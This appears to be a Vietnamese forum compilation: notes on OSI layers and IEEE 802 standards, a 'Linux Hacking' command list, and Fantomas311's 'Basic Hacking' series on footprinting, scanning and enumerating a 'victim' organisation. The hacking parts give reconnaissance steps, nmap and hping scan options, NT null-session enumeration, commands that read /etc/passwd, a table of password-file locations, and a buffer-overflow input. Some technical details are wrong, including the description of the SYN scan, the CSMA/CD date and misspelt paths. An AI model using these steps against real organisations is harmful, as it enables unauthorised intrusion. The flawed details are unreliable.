Mức mạng nhằm bảo đảm trao đổi thông tin giữa các mạng con trong một mạng lớn, mức này còn được gọi là mức thông tin giữa các mạng con với nhau. Trong mức mạng các gói dữ liệu có thể truyền đi theo từng đường khác nhau để tới đích. Do vậy, ở mức này phải chỉ ra được con đường nào dữ liệu có thể đi và con đường nào bị cấm tại thời điểm đó. Thường mức mạng được sử dụng trong trường hợp mạng có nhiều mạng con hoặc các mạng lớn và phân bổ trên một không gian rộng với nhiều nút thông tin khác nhau.

Mức 4: Mức truyền (Transport Layer)
Nhiệm vụ của mức này là xử lý các thông tin để chuyển tiếp các chức năng từ mức trên nó (mức tiếp xúc) đến mức dưới nó (mức mạng) và ngược lại. Thực chất mức truyền là để đảm bảo thông tin giữa các máy chủ với nhau. Mức này nhận các thông tin từ mức tiếp xúc, phân chia thành các đơn vị dữ liệu nhỏ hơn và chuyển chúng tới mức mạng.

Mức 5: Mức tiếp xúc (Session Layer)
Mức này cho phép người sử dụng tiếp xúc với nhau qua mạng. Nhờ mức tiếp xúc những người sử dụng lập được các đường nối với nhau, khi cuộc hội thoại được thành lập thì mức này có thể quản lý cuộc hội thoại đó theo yêu cầu của người sử dụng. Một đường nối giữa những người sử dụng được gọi là một cuộc tiếp xúc. Cuộc tiếp xúc cho phép người sử dụng được đǎng ký vào một hệ thống phân chia thời gian từ xa hoặc chuyển một file giữa 2 máy.

Mức 6: Mức tiếp nhận (Presentation Layer)
Mức này giải quyết các thủ tục tiếp nhận dữ liệu một cách chính quy vào mạng, nhiệm vụ của mức này là lựa chọn cách tiếp nhận dữ liệu, biến đổi các ký tự, chữ số của mã ASCII hay các mã khác và các ký tự điều khiển thành một kiểu mã nhị phân thống nhất để các loại máy khác nhau đều có thể thâm nhập vào hệ thống mạng.

Mức 7: Mức ứng dụng (Application Layer)
Mức này có nhiệm vụ phục vụ trực tiếp cho người sử dụng, cung cấp tất cả các yêu cầu phối ghép cần thiết cho người sử dụng, yêu cầu phục vụ chung như chuyển các file, sử dụng các terminal của hệ thống,.... Mức sử dụng bảo đảm tự động hoá quá trình thông tin, giúp cho người sử dụng khai thác mạng tốt nhất.
Hệ thống kết nối mở OSI là hệ thống cho phép truyền thông tin với các hệ thống khác, trong đó các mạng khác nhau, sử dụng những giao thức khác nhau, có thể thông báo cho nhau thông qua chương trình Pastren để chuyển từ một giao thức này sang một giao thức khác.

Tiêu chuẩn IEEE LAN được phát triển dựa vào uỷ ban IEEE 802. Tiêu chuẩn IEEE 802.3 liên quan tới mạng CSMA/CD bao gồm cả 2 version băng tần cơ bản và băng tần mở rộng. Tiêu chuẩn IEEE 802.4 liên quan tới sự sắp xếp tuyến token và IEEE 802.5 gồm các vòng truyền token.

Theo chuẩn 802 thì móc nối dữ liệu được chia thành 2 mức con: mức con điều khiển logic LLC (Logical Link Control Sublayer) và mức con điều khiển xâm nhập mạng MAC (Media Access Control Sublayer). Mức con LLC giữ vai trò tổ chức dữ liệu, tổ chức thông tin để truyền và nhận. Mức con MAC chỉ làm nhiệm vụ điều khiển việc xâm nhập mạng. Thủ tục mức con LLC không bị ảnh hưởng khi sử dụng các đường truyền dẫn khác nhau, nhờ vậy mà linh hoạt hơn trong khai thác.

Chuẩn 802.2 ở mức con LLC tương đương với chuẩn HDLC của ISO hoặc X.25 của CCITT.

Chuẩn 802.3 xác định phương pháp thâm nhập mạng tức thời có khả năng phát hiện lỗi chồng chéo thông tin CSMA/CD. Phương pháp CSMA/CD được đưa ra từ nǎm 1993 nhằm mục đích nâng cao hiệu quả mạng. Theo chuẩn này các mức được ghép nối với nhau thông qua các bộ ghép nối.

Chuẩn 802.4 thực chất là phương pháp thâm nhập mạng theo kiểu phát tín hiệu thăm dò token qua các trạm và đường truyền bus.

Chuẩn 802.5 dùng cho mạng dạng xoay vòng và trên cơ sở dùng tín hiệu thăm dò token. Mỗi trạm khi nhận được tín hiệu thăm dò token thì tiếp nhận token và bắt đầu quá trình truyền thông tin dưới dạng các frame. Các frame có cấu trúc tương tự như của chuẩn 802.4. Phương pháp xâm nhập mạng này quy định nhiều mức ưu tiên khác nhau cho toàn mạng và cho mỗi trạm, việc quy định này vừa cho người thiết kế vừa do người sử dụng tự quy định.
__________________


Các lệnh cơ bản trong Linux Hacking
Copyright : sưu tầm
_ Lệnh " man" : Khi bạn muốn biết cách sử dụng lệnh nào thì có thể dùng tới
lệnh nay :
Cấu trúc lệnh : $ man .
Ví dụ : $ man man
_ Lệnh " uname ": cho ta biết các thông tin cơ bản về hệ thống
Ví dụ : $uname -a ; nó sẽ đưa ra thông tin sau :

Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

_ Lệnh id : xem uid/gid hiện tại ( xem nhóm và tên hiện tại )

_ Lệnh w : xem các user đang login và action của họ trên hệ thống .
Ví Dụ : $w nó sẽ đưa ra thông tin sau :

10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

_ Lệnh ps: xem thông tin các process trên hệ thống
Ví dụ : $ps axuw
_ Lệnh cd : bạn muốn di chuyển đến thư mục nào . phải nhờ đến lệnh này .

Ví du : $ cd /usr/bin ----> nó sẽ đưa bạn đến thư mục bin
_ Lệnh mkdir : tạo 1 thư mục .
Ví dụ : $ mkdir /home/convit ---> nó sẽ tạo 1 thư mục convit trong /home
_ Lệnh rmdir : gỡ bỏ thư mục
Ví dụ : $ rmdir /home/conga ----> nó sẽ gỡ bỏ thư mục conga trong /home .
_ Lệnh ls: liệt kê nội dung thư mục
Ví dụ : $ls -laR /
_ Lệnh printf: in dữ liệu có định dạng, giống như sử dựng printf() của C++ .

Ví dụ : $printf %s "\x41\x41\x41\x41"
_ Lệnh pwd: đưa ra thư mục hiện hành
Ví dụ : $pwd ------> nó sẽ cho ta biết vị trí hiện thời của ta ở đâu :
/home/level1
_ Các lệnh : cp, mv, rm có nghĩa là : copy, move, delete file
Ví dụ với lệnh rm (del) : $rm -rf /var/tmp/blah ----->nó sẽ del file blah .
Làm tương tự đối với các lệnh cp , mv .
_ Lệnh find : tìm kiếm file, thư mục
Ví dụ : $find / -user level2
_ Lệnh grep: công cụ tìm kiếm, cách sử dụng đơn giản nhất : grep "something"
Vidu : $ps axuw | grep "level1"
_ Lệnh Strings: in ra tất cả các ký tự in được trong 1 file. Dùng nó để tìm
các khai báo hành chuỗi trong chương trình, hay các gọi hàm hệ thống, có khi tìm
thấy cả password nữa
VD: $strings /usr/bin/level1
_ Lệnh strace: (linux) trace các gọi hàm hệ thống và signal, cực kỳ hữu ích để
theo dõi flow của chương trình, cách nhanh nhất để xác định chương trình bị
lỗi ở đoạn nào. Trên các hệ thống unix khác, tool tương đương là truss, ktrace
.
Ví dụ : $strace /usr/bin/level1
_ Lệnh" cat, more ": in nội dung file ra màn hình

$cat /etc/passwd | more --> nó sẽ đưa ra nội dung file passwd một cách nhanh nhất .
$more /etc/passwd ----> Nó sẽ đưa ra nội dung file passwd một cách từ từ .

_ Lệnh hexdump : in ra các giá trị tương ứng theo ascii, hex, octal, decimal của dữ
liệu nhập vào .
Ví dụ : $echo AAAA | hexdump
_ Lệnh : cc, gcc, make, gdb: các công cụ biên dịch và debug .
Ví dụ : $gcc -o -g bof bof.c
Ví dụ : $make bof
Ví dụ : $gdb level1
(gdb) break main
(gdb) run
_ Lệnh perl: một ngôn ngữ
Ví dụ : $perl -e 'print "A"x1024' | ./bufferoverflow ( Lỗi tràn bộ đệm khi ta đánh
vào 1024 kí tự )
_ Lệnh "bash" : đã đến lúc tự động hoá các tác vụ của bạn bằng shell
script, cực mạnh và linh hoạt .
Bạn muốn tìm hiểu về bash , xem nó như thế nào :
$man bash
_ Lệnh ls : Xem nội dung thư mục ( Liệt kê file trong thư mục ) .
Ví Dụ : $ ls /home ----> sẽ hiện toàn bộ file trong thư mục Home
$ ls -a -----> hiện toàn bộ file , bao gồm cả file ẩn
$ ls -l -----> đưa ra thông tin về các file
_ Lệnh ghi dữ liệu đầu ra vào 1 file :
Vídụ : $ ls /urs/bin > ~/convoi ------> ghi dữ liệu hiển thị thông tin của thư mục
bin vào 1 file convoi .

Những hiểu biết cơ bản xung quanh Linux :

a . ) Một vài thư mục quan trọng trên server :

_ /home : nơi lưu giữ các file người sử dụng ( VD : người đăng nhập hệ thống
có tên là convit thì sẽ có 1 thư mục là /home/convit )
_ /bin : Nơi xử lý các lệnh Unix cơ bản cần thiết như ls chẳng hạn .
_ /usr/bin : Nơi xử lý các lệnh dặc biệt khác , các lệnh dùng bởi người sử
dụng đặc biệt và dùng quản trị hệ thống .
_ /bot : Nơi mà kernel và các file khác được dùng khi khởi động .
_ /ect : Các file hoạt động phụ mạng , NFS (Network File System ) Thư tín ( Đây là
nơi trọng yếu mà chúng ta cần khai thác nhiều nhất )
_ /var : Các file quản trị
_ /usr/lib : Các thư viện chuẩn như libc.a
_ /usr/src : Vị trí nguồn của các chương trình .

b . ) Vị trí file chứa passwd của một số phiên bản khác nhau :


AIX 3 /etc/security/passwd !/tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Ren /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *
__________________

Tác giả: fantomas311
Tác giả: fantomas311 (Hiện đang ẩn tại hang động có tên là VNISS)

Basic Hacking

***** Foot Printing *****
=== Author : Fantomas311 ===
Thân chào tất cả các bạn , nhằm đáp ứng nhu cầu học hỏi trong hacking và security, fantomas311 đã biên soạn một bộ bài viết "Basic hacking" và các bài viết liên quan đến hacking hệ thống để giới thiệu đến các bạn . Xin khuyến cáo với những ai muốn học hack một cách fast food là các bạn không nên đọc bài viết này ! Vì tôi không post những bài dạy hack cho các bạn , mà tôi chỉ post bài theo phương châm "hack như thế nào" . Hãy đọc , suy nghĩ và làm bằng đôi tay và khối óc của mình !!

Trước khi các hacker thực sự bắt tay vào việc, họ phải tiến hành 3 bước cơ bản là in dấu ấn (foot printing) , Quét (scanning) và điểm danh(enumeration). Bài viết này đề cập đến kỹ thuật in dấu ấn và những vấn đề liên quan.
**In dấu ấn là gì ??**
In dấu ấn là việc dùng các công cụ và kỹ thuật để lấy thông tin cơ bản đầu tiên về một tổ chức hoặc một chuyên khu web muốn tấn công ( trong bài viết này tạm gọi là victim). Việc in dấu ấn có hệ thống một tổ chức sẽ cho phép hacker thấy rõ tình hình an ninh ( độ bảo mật) của tổ chức đó.
**Tại sao cần in dấu ấn ??**
Foot Printing giúp có thể định danh tất cả các mẩu tin và nắm những thông tin cơ bản (đôi khi khá quan trọng) về victim
** Kỹ thuật in dấu ấn **
Có rất nhiều kỹ thuật in dấu ấn khác nhau, bài viết này sẽ mô tả các bước giúp bạn hoàn thành một đợt phân tích dấu ấn kỹ lưỡng.
*Bước 1: định phạm vi hoạt động: Bước này nói cho đơn giản là bạn phải xác định rõ cái mà bạn muốn hack là gì ( một công ty , một server hay chỉ là một web cá nhân ... )
- Đối với người mới bắt đầu, bạn nên đọc kỹ và ghi lại những thông tin mà trang web cung cấp cho bạn ( những thông tin về nó , như số ĐT , mail của webmaster , địa chỉ ....). Có nhiều khi những thông tin này lại là "chiếc chìa khoá vàng" cho bạn Những mục đáng quan tâm bao gồm :
+ Các vị trí
+ Các công ty hoặc thực thể liên quan
+ Các kết nối hoặc tin tức có được
+ Các ngôn ngữ bảo mật nêu rõ các cơ chế bảo mật đã thiết đặt ( cấu hình fire wall chẳng hạn )
+ Các số điện thoại , tên liên lạc và Email .....
Ngoài ra, bạn cũng có thể xem lại mã nguồn HTML để tìm những sơ hở trong lập trình , bên cạnh đó , những chú thích nằm trong các thẻ HTML như < ! và ~ cũng là một " tài nguyên" đáng khai thác !! ( thí dụ như <! password của mục này là 123456 !> )
Sau khi nghiên cứu trang web , bạn tìm thêm những thông tin cung cấp các manh mối bổ sung về tình trạng của tổ chức và tình hình an ninh của nó ( trên báo chí , các bản tin trên NET chẳng hạn) . Những động cơ tìm kiếm là chìa khoá cho bạn . Sau đây là một vài động cơ tìm kiếm :
http://google.com http://sec.gov
http://cyberarmy.com http://Http://deja.com
http://networksolution.com http://dogpile.com
http://astalavista.com http://ipswich.com
http://arin.net/whois/ http://ferretsoft.com
Okie, hãy tiến hành bước đấu tiên trong kỹ thuật Hack !! B)
*Bước 2 : điểm danh mạng
Trong bước này , việc đầu tiên là định danh các domain và mạng có liên quan đến victim . Muốn làm điều này , hãy truy xuất dữ liệu của network solution ( www.networksolution.com ) và American Registry for Internet Number ( www.arin.net )
Một số kiểu truy vấn :
+Organizational : Tất cả các thông tin có liên quan đến một tổ chức cụ thể
+Domain:--------------------------------------------------------------- domain -------
+Network:---------------------------------------------------------------mạng hoặc IP
+Point of contact:-----------------------------------------------------1 cá nhân cụ thể ( admin )
*Bước 3 : Truy vấn DNS
Sau khi định danh các domain của tổ chức đích (victim), bạn có thể bắt đầu truy vấn DNS . Nếu DNS được cấu hình bấp bênh, ta có thể moi được thông tin tiết lộ về tổ chức . Một trong những cách cấu hình sai nghiêm trọng nhất mà một điều hành viên có thể mắc phải là cho phép người dùng internet không tin cậy thực hiện chuyển giao miền DNS ( zone transfer). Sự cố này có thể cho thấy tên hệ chủ, các IP ẩn .... nói chung là các thông tin muốn che dấu ! Việc cung cấp địa chỉ IP bên trong cho 1 người dùng không tin cậy trên internet cũng giống như cung cấp bản đồ ngôi nhà mình cho kẻ trộm vậy !!
Đến đây, có lẽ bạn có một câu hỏi " Zone transfer - how ??" . Xin thưa là đây là một vấn đề khác, có lẽ tôi sẽ đề cập trong một bài viết khác của mình để tránh loãng bài viết . Kết thúc bước 3 tại đây !
*Bước 4: trinh sát mạng
Sau khi đã có bản đồ trong tay, thì đây là giai đoạn "xâm nhập thực tế" để xác định lộ trình truy cập tiềm năng mạng ( tạm hiểu như là việc do thám để xác định các con đường trước khi tiến hành đánh cướp á mà ! )
Để thực hiện công việc này , xin giới hiệu các bạn chương trình trace route ( ftp://ftp.ec.lbl/traceroute.tar.z ) có trong hầu hết phiên bản của Unix & WinNT . Trong WinNT , nó có tên là tracert.
Trace route là một công cụ chẩn đoán do Van Jacobson viết để cho phép xem tuyến đường mà một gói tin IP sẽ theo từ server này sang server khác
Nếu bạn không rành các lệnh trong Unix , có thể dùng VIsual Route ( http://www.visualroute.com ) để thực hiện tiến trình trinh sát(tracerouting) này . Giao diện của visual route trông rất bắt mắt & dễ sử dụng. Nhưng không có tác dụng tốt với các mạng có quy mô lớn .
Ngoài ra , bạn còn có thể thực hiện một kỹ thuật phức tạp hơn gọi là "tiến trình quét giao thức firewall" (sẽ đề cập ở Basic hacking II - Scanning của fantomas311 )

Vậy là công đoạn đầu tiên của việc hack vào một hệ thống đã xong . Bây giờ, sau khi đã thực hiện hoàn tất các bước trên, bạn ( tôi chỉ nói những người đã làm đúng các bước trên) có thể tự hỏi : "vậy có tác dụng gì ??" Làm gì tiếp theo??" "những thông tin thu được có tác dụng gì?" " Có nhất thiết phải thực hiện bước này không ?? "
Nhiều câu hỏi quá ! Nhưng xin để các bạn tự trả lời vậy ! Tôi chỉ trả lời 1 câu thôi ! Bước tiếp theo của quá trình hack - theo lý thuyết - là Scanning . Quá trình Scanning sẽ được đề cập trong bài viết tiếp theo của fantomas311 : " Basic Hacking part II - Scanning"
----- Mọi chi tiết xin liên hệ : Fantomas311@yahoo.com -----
Hy vọng bài viết này làm bạn hài lòng
Happy hacking
Thân !


***** Scanning *****
=== Author : Fantomas311 ===
Nếu Foot Printing là thu thập tất cả thông tin có liên quan đến tổ chức đích thì Scan là một bước xác định xem trong mớ bòng bong kia thì cái nào là "xài được" bằng các đợt quét ping, quét cổng và các công cụ phát hiện tự động

Nếu kỹ thuật zone transfer cho ta 1 địa chỉ IP thì scan sẽ giúp ta xác định xem nó ở port nào và nó có phải là một IP thực hay không. Có một số server hiển thị cả các IP của mạng tư ( thí dụ như 10.10.10.0 ). Một địa chỉ IP như thế không thể định tuyến ( xem http://www.ietf.org/rfc/rfc1918.txt để biết thêm chi tiết)

++ Quét Ping mạng : Ngòai quét ping truyền thống bằng cách mở cửa sổ DOS và tyoe lệnh Ping như chúng ta đều biết, còn một số kiểu quét ping khác như :
+ Fping: dùng trong Unix ( http://ftp.tamu.edu/pub/Unix/src ) fping là một trình tiện ích gửi đi các yêu cầu mass ping theo kiểu song song vì thế fping quét được nhiều địa chỉ IP hơn so với ping
+ Nmap ( http://insecure.org/nmap ) : Có lẽ không cần nói nhiều về trình tiện ích này , có khá nhiều hướng dẫn đầy đủ cách sử dụng và chức năng của nmap trên mạng. Nmap cung cấp khả năng quét ping với tùy chọn -sP
+ Pinger : dùng cho Windows, sản phẩm miễn phí của Rhino9 ( http://207.98.195.250/software/ ) là một trong các trình tiện ích nhanh nhất sẳn có
+ Ping Sweep : Sản phẩm của Solarwinds, chạy khá nhanh, nhưng công cụ này có thể làm bão hòa một mạng có tuyến nối kết chậm ( Cái này xài ở VN ko ổn nên ko giới thiệu chi tiết )
+ WS Ping Proback ( http://www.ipswich.com ) và các công cụ netscan ( http://www.nwpsw.com ) đủ để quét một mạng nhỏ, tiện dụng và giao diện đơn giản , tuy nhien khá chậm so với pinger và ping sweep . Người mới bắt đầu nên sử dụng lọai này !

Về cơ bản thì ping là quá trình gửi và nhận các gói tin ICMP (Internet Control Messaging Protocol ) . Vậy nếu ICMP bị phong tỏa bởi quản trị mạng của chuyên khu đích thì sao ? Trường hợp điển hình là khi type lệnh ping một domain mà không nhận được hồi âm nào , lúc đó ICMP tại bộ định tuyến biên bị phong tỏa hoặc có một fire wall đã được thiết lập . Trong trường hợp này ta có hai lựa chọn :
+ Bỏ qua quét ping mà thực hiện quét cổng (port Scan) : Sẽ đề cập ở phần sau của bài viết này .
+ Thực hiện ping TCP:
- Dùng Nmap với tùy chọn -PT . Tùy chọn này sẽ gửi các gói tin TCP SYN đến mạng đích và đợi đáp ứng, các hệ chủ "còn sống" sẽ đáp ứng bằng một gói tin TCP SYN/ACK. Phương pháp này khá hiệu quả để xác định xem hệ chủ có còn sống hay không cho dù chuyên khu đã phong tỏa ICMP .Bạn nên lặp lại kiểu quét này vài lần trên các cổng chung như SMTP (25) , POP (110) , IMAD ( 143 ) , hoặc các cổng có thể là duy nhất đối với các chuyên khu nhất định
- HPing ( http://www.kyuzz.org/antirez/ ) là một trình tiện ích ping TCP khác có công năng bổ sung TCP qua mặt cả Nmap . Hping cho phép người dùng điều khiển các tùy chọn cụ thể về gói tin TCP có thể cho phép nó đi qua một số thiết bị kiểm sóat truy cập nhất định. Nhờ ấn định cổng đích với tùy chọn -P , bạn có thể phá vỡ vài thiết bị kiểm sóat truy cập tương tự như kỹ thuật trace route đã nêu ở Part I có thể dùng Hping để thực hiện các đợt quét ICMP và có thể phân mảnh [ fragment ] các gói tin có tiềm năng phớt lờ một số thiết bị kiểm soát truy cập .Hping sẽ được đề cập chi tiết hơn ở phần sau

Tóm lại , bước này cho phép xác định một cách chính xác các hệ thống còn sống hay không thông qua ICMP hoặc thông qua cổng quét chọn lọc . Làm như vậy, ta đã giảm bớt đáng kể tiến trình ấn định đích, tiết kiệm thời gian trắc nghiệm và thu hẹp trọng tâm của các hoạt động .

++ Truy vấn ICMP : Bạn có thể thu thập tất cả các kiểu thông tin quý giá về một hệ thống bằng cách đơn giản gửi một gói tin ICMP cho nó , các công cụ có thể down load tại http://securityfocus.com
++ Quét cổng (port scan): đến lúc này , ta đã định danh các hệ thống còn sống bằng cách dùng các đợt quét ping ICMP hoặc TCP và đã thu thập được một ít thông tin ICMP . Giờ đây ta đã sẵn sàng tiến trình quét cổng từng hệ thống. Quét cổng là tiến trình nối với các cổng TCP và UDP trên hệ đích để xác định các dịch vụ đang chạy hoặc đang ở trạng thái LISTENNING . Ta phải định danh các cổng đang lắng chờ nếu như muốn xác định kiểu hệ điều hành và các ứng dụng đang dùng. Các dịch vụ hoạt động đang lắng chờ (listenning) có thể cho phép một người dùng trái phép giành được quyến truy cập các hệ thống bị cấu hình sai. Sau đây,ta coi như các hệ thống mà ta đã định danh ở bước trên là còn sống ( alive ) , mục tiêu của việc quét cổng là :
+ Định danh các dịch vụ TCP và UDP đang chạy trên hệ đích
+ Định danh kiểu hệ điều hành của hệ đích
+ Định danh các ứng dụng cụ thể hoặc các phiên bản của một dịch vụ cụ thể

** Các kiểu quét : trước khi giới thiệu các công cụ quét cổng chủ yếu, ta phải xét qua các kỹ thuật quét cổng sẵn dùng :

* Quét nối TCP : kiểu quét này nối với cổng đích và hòan thành một đợt bắt tay ba chiều đầy đủ ( SYN , SYN/ACK , ACK ) hệ đích có thể dễ dàng phát hiện nó . Tiến trình bắt tay ba chiều TCP gồm :
= Gửi gói tin SYN đến hệ phục vụ
= Nhận gói tin SYN/ACK từ hệ phục vụ
= Gửi gói tin ACK đến hệ phục vụ

* Quét TCP SYN : kỹ thuật này là việc thực hiện một tuyến nối TCP đầy đủ, nghĩa là : gửi gói tin SYN đến cổng đích , ta có thể suy ra nó nằm trong trạng thái listenning. Nếu nhận được một RST/ACK nó thường cho thấy cổng đang không lắng chờ: một RST/ACK sẽ được gửi bởi hệ thống thực hiện quét cổng để một tuyến nồi đầy đủ không bao giờ được thiết lập.Kỹ thuật này có ưu điểm là mang tính lén lút hơn một tuyến nối TCP đầy đủ

* Quét TCP FIN : kỹ thuật này gửi một gói tin FIN cho cổng đích. Dựa trên RFC 793 ( http://www.ietf.org/rfc/rfc0793.txt ) hệ đích sẽ gửi trả một RTS cho tất cả các cổng đã đóng.Kỹ thuật này thường chỉ làm việc trên các ngăn xếp TCP/IP gốc Unix

* Quét TCP Xmas Tree : Kỹ thuật này gửi một gói tin FIN , URG và PUSH cho cổng đích dựa trên RFC 793, hệ đích sẽ gửi trả một RST của tất cả các cổng đã đóng.

* Quét TCP Null : giống TCP Xmas Tree

* Quét UDP : Kỹ thuật này gửi một gói tin UDP cho cổng đích. Nếu cổng đích đáp ứng bằng một thông điệp "ICMP port unreachable ", cổng đã đóng. Ngược lại, nếu không nhận được thông điệp trên, ta có thể suy ra cổng mở ! Độ chính xác của kỹ thuật này tùy thuộc nhiều vào yếu tố có liên quan đến việc sử dụng các tài nguyên mạng và hệ thống. Khi thực hiện các đợt quét cổng UDP, có thể sẽ cho kết quả khác nhau . Một số thực thi IP sẽ gửi trả tất cả các RTS của tất cả các cổng đã quét dẫu chúng có đang lắng chờ hay không

* Định danh các dịch vụ TCP và UDP đang chạy : trình tiện ích của một công cụ quét cổng tốt nhất là một thành phần quan trọng của tiến trình in dấu ấn. Tuy có nhiều bộ quét cổng sẵn dùng cho cả Unix và NT , nhưng tôi sẽ đề cập đến một số bộ quét cổng thông dụng và nhanh :

- Strobe :strobe là một trong những bộ quét TCP nhanh và đáng tin cậy sẵn dùng , được viết bởi Julian Arrange ( ftp.win.or.jp/pup/network/misc/strobe-105.ta.gz ) Một số tính năng chính của Strobe bao gồm khả năng tối ưu hóa các tài nguyên mạng, hệ thống và quét hệ đích một cách có hiệu quả . Ngòai tính hiệu quả , phiên bản 1.04 của strobe về sau sẽ nắm giữ các banner kết hợp của từng cổng mà chúng nối với . Điều này có thể giúp định danh hệ điều hành lẫn dịch vụ đang chạy . Tính năng nắm giữ banner sẽ được nói nhiều hơn ở Part III
Tuy nhiên Strobe cũng có một số nhược điểm là không cung cấp khả năng quét UDP và hệ đích có thể dễ dàng phát hiện

- Up_Scan : Nếu Strobe cung cấp khả năng quét TCP thì Up_Scan là một trong những bộ quét UDP tin cậy nhất ( http://wwdsilx.wwdsi.com ) Nhược điểm : dễ bị phát hiện

- Netcat : trình tiện ích này có thể thực hiện rất nhiều công việc , cũng như nmap, nóp là công cụ không thể thiếu trong hacking cũng như security. Để quét TCP và UDP , ta sử dụng các tùy chọn -v và -vv , -z, -wz, -u

- PortPro và PortScan: trong WinNT thì portPro và PortScan là hai trình tiện ích quét cổng nhanh nhất.PortPro cùa StOrM ( http://securityfocus.com )và portScan là sản phẩm của Rhad. PortScan cung cấp một miền các cổng để quét trong khi portpro đơn giản gia số các cổng của nó, nhưng cả hai đều không cung cấp các miền địa chỉ IP .Portpro là một trong những công cụ quét cổng nhanh nhất sẵn dùng , tuy nhiên càc tùy chọn của nó còn hạn chế !

- Ngòai ra, công cụ quét cổng mạnh nhất vẫn là nmap ( đã giới thiệu ở phần trước )

** Các công cụ phát hiện tự động:

+ Cheops ( http://www.marko.net/cheops/ ) cung cấp khả năng quét ping, trace route , khả năng quét cổng và tính năng phát hiện hệ điều hành
+ Tkined là một phần của bộ Scotty có tại http://wwwhome.cs.wtwente.nl/~choenw/Scotty/ là một bộ sọan thào mạng được viết trong TCL tích hợp các công cụ quản lý mạng khác nhau ,cho phép bạn phát hiện các mạng IP


Hết Part II - Khi nào rảnh post tiếp Part III - Enumeration ( điểm danh mạng )

Happy Hacking
Thân !


******Enumeration*******
=== Author: Fantomas311 ===
Giả sử việc thực hiện các bước I và II đều không thành công hoặc những thông tin thu được không thể đủ để phát động một cuộc tấn công tức thời nào,hacker sẽ chuyển sang phương pháp định danh các tài khoản người dùng hợp lệ hoặc các tài nguyên dùng chung không được bảo vệ kỹ
Enumeration (điểm danh) là một cách để trích các tài khoản hợp lệ hoặc các tài nguyên từ hệ thống. Ở Part III này, tôi sẽ nêu chi tiết các phương pháp thông dụng nhất, và các công cụ cơ bản của kỹ thuật điểm danh - buớc thứ ba trong basic hacking
Sự khác biệt chính giữa các kỹ thuật thu thập thông tin ở part I ( Foot Printing) và part II ( scanning) và kỹ thuật enumeration dưới đây nằm ở cấp xâm nhập của hacker . Điểm danh liên quan đến các tuyến nối tích cực với các hệ thống và các truy vấn có định hướng.
Phần lớn thông tin thu thập được qua kỹ thuật điểm danh thoạt nhìn có vẻ như vô hại.Tuy nhiên, những thông tin rò rĩ từ lỗ thủng theo sau nó có thể gây tai hại. Nói chung, sau khi điểm danh một tên người dùng hoặc một phần dùng chung hợp lệ, vấn đề còn lại là thời gian trước khi hacker đoán được mật hiệu tương ứng hoặc tìm ra các điểm yếu kết hợp với các giao thức chia sẽ tài nguyên.
Những thông tin mà kỹ thuật điểm danh thu được có thể tạm thu gọn thành các phạm trù sau :
++ Các tài nguyên mạng và các phần dùng chung
++ User và các group
++ Các ứng dụng và biểu ngữ (banner)
Kỹ thuật điểm danh cũng cụ thể theo từng hệ điều hành của server, và do đó ,nó cũng phụ thuộc vào các thông tin thu thập được từ part I và part II . Trong phần này, tôi sẽ lần lươt đề cập đến kỹ thuật điểm danh trong các hệ điều hành : WinNT , Novell và Unix

*******Windows NT********
Tại sao lại là WinNT ?? Đối với kỹ thuật điểm danh thì WinNT có thể xem là một người bạn thân thiết ! Còn tại sao thì.....hạ hồi phân giải nhá !

+++ Điểm danh khu ủy ( domain ) của winNT bằng netview :

Windows là hệ điều hành được thiết kế tạo thuận lợi cho tính năng duyệt các tài nguyên mạng, do đó tiến trình điểm danh các domain NT là cực kỳ đơn giản so với các hệ điều hành khác. Trong hầu hết các trường hợp, chỉ cần dùng các công cụ cài sẵn trong OS ( Operating System ). Lệnh netview là một thí dụ điển hình. Nó sẽ liệt kê các domain sẵn dùng trên mạng, rồi phơi bày thông tin của tất cả các máy tính trong một domain (ta cũng có thể dùng thông tin từ các đợt quét ping trong các phần trước để tìm hiểu các tên domain từ các máy riêng lẻ chỉ việc dùng địa chỉ IP thay cho server name . Sau đây là thí dụ :
Trước hết là điểm dang các domain trên mạng :
C:\> netview /domain
Liệt kê các máy tính trong 1 domain cụ thể :
C:\> netview /domain:têndomain

+++Điểm danh các hệ điều khiển domain NT :

Để đào sâu hơn một chút vào cấu trúc mạng NT , ta cần dùng một công cụ từ NT Resource Kit ( NTRK - lưu ý : từ này dùng khá nhiều trong bài viết này !) , cũng được xem là Windows NT Hacking Kit bởi bản chất dao hai lưỡi của nhiều trình tiện ích điều hành mạnh mà nó cung cấp ! Trước tiên, xin giới thiệu sơ lược về cái gọi là NTRK này :
- NTRK là một bộ tài liệu bổ trợ cho WinNT có kèm CD chứa các trình tiện ích để quản lý mạng.NTRK chứa một tập hợp các trình tiện ích mạnh, đa dạng từ ngôn ngữ Perl phổ dụng đến các cổng của nhiều trình tiện ích Unix , đến các công cụ điều hành từ xa không có trong các phiên bản lẻ của WinNT.Nó là một bộ đồ nghề không thề thiếu cho các điều hành viên mạng NT và cũng là công cụ hữu ích cho các hacker muốn khai thác winNT. Cũng có lẽ vì đó mà giá bán lẻ của NTRK vào khoảng ... 200 USD. Hì, nhưng không sao, vẫn còn một giải pháp free cho bạn tại ftp://ftp.microsoft.com/bussys/winnt/winnt-public/reskit/

Trở lại vấn đề điểm danh các hệ điều khiển domain NT: để thực hiện công việc này, ta dùng công cụ có tên là nltest trong NTRK để định danh các PDC (Primary Domain Controllers ) và BDC ( Backup Domain Controllers )
Câu lệnh : C:\> nltest /delist:[domain name]
Thậm chí, để tiến xa hơn, ta cần dùng Holy Grail của tính năng điểm danh NT, tuyến nối rỗng , hoặc nặc danh ( sẽ giới thiệu sau đây ). Sau khi xác lập một phiên làm việc rỗng cho một trong các máy trên khu ủy điểm danh, ta có thể dùng cú pháp nltest /server:[server name] và /trusted_domain để tìm hiểu thêm các domain NT có liên quan đến domain đầu tiên !

** Phương pháp NT toàn cục **

